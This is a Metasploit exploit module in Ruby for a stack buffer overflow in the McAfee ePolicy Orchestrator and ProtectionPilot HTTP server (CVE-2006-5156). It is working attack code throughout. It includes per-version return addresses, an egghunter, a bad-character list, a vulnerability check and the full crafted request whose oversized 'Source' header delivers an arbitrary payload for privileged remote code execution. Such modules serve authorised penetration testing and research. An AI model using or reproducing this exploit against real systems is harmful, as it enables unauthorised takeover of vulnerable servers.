McAfee ePolicy Orchestrator / ProtectionPilot Overflow

`##  
# $Id$  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
  
  
class Metasploit3 < Msf::Exploit::Remote  
  
include Msf::Exploit::Remote::Tcp  
include Msf::Exploit::Remote::Egghunter  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'McAfee ePolicy Orchestrator / ProtectionPilot Overflow',  
'Description' => %q{  
This is an exploit for the McAfee HTTP Server (NAISERV.exe).  
McAfee ePolicy Orchestrator 2.5.1 <= 3.5.0 and ProtectionPilot 1.1.0 are  
known to be vulnerable. By sending a large 'Source' header, the stack can  
be overwritten. This module is based on the exploit by xbxice and muts.  
Due to size constraints, this module uses the Egghunter technique. You may  
wish to adjust WfsDelay appropriately.  
},  
'Author' =>  
[  
'muts <muts [at] remote-exploit.org>',  
'xbxice[at]yahoo.com',  
'hdm',  
'patrick' # MSF3 rewrite, ePO v2.5.1 target  
],  
'Arch' => [ ARCH_X86 ],  
'License' => MSF_LICENSE,  
'Version' => '$Revision$',  
'References' =>  
[  
[ 'CVE', '2006-5156' ],  
[ 'OSVDB', '29421 ' ],  
[ 'URL', 'http://www.milw0rm.com/exploits/2467' ],  
[ 'URL', 'http://www.remote-exploit.org/advisories/mcafee-epo.pdf' ],  
[ 'BID', '20288' ],  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'thread',  
},  
'Payload' =>  
{  
'Space' => 1000,  
'BadChars' => "\x00\x09\x0a\x0b\x0d\x20\x26\x2b\x3d\x25\x8c\x3c\xff",  
},  
'Platform' => 'win',  
'Targets' =>  
[  
[ 'ePo 2.5.1 (Service Pack 1)', { 'Ret' => 0x600741b5 } ], # p/p/r nahttp32.dll 2.5.1.213  
[ 'ePo 3.5.0/ProtectionPilot 1.1.0', { 'Ret' => 0x601EDBDA } ], # p/p/r xmlutil.dll  
],  
'Privileged' => true,  
'DisclosureDate' => 'Jul 17 2006'))  
  
register_options(  
[  
Opt::RPORT(81),  
], self.class)  
end  
  
def autofilter  
false  
end  
  
def check  
connect  
  
req = "GET /SITEINFO.INI HTTP/1.0\r\n"  
req << "User-Agent: Mozilla/5.0\r\n"  
sock.put(req + "\r\n\r\n")  
  
banner = sock.get(-1,3)  
  
if (banner =~ /Spipe\/1.0/)  
return Exploit::CheckCode::Appears  
end  
return Exploit::CheckCode::Safe  
end  
  
def exploit  
connect  
  
hunter = generate_egghunter  
egg = hunter[1]  
  
sploit = Rex::Text::rand_text_alphanumeric(92)  
sploit << Rex::Arch::X86.jmp_short(6)  
sploit << Rex::Text::rand_text_alphanumeric(2)  
sploit << [target['Ret']].pack('V')  
sploit << hunter[0]  
  
content = egg + egg + payload.encoded  
  
request = "GET /spipe/pkg HTTP/1.0\r\n"  
request << "User-Agent: Mozilla/4.0 (compatible; SPIPE/1.0\r\n"  
request << "Content-Length: " + content.length.to_s + "\r\n"  
request << "AgentGuid=" + Rex::Text::rand_text_alphanumeric(64) + "\r\n"  
request << "Source=" + sploit + "\r\n"  
request << "\r\n"  
request << content  
  
sock.put(request + "\r\n\r\n")  
  
disconnect  
handler  
end  
  
def wfs_delay  
25  
end  
end  
`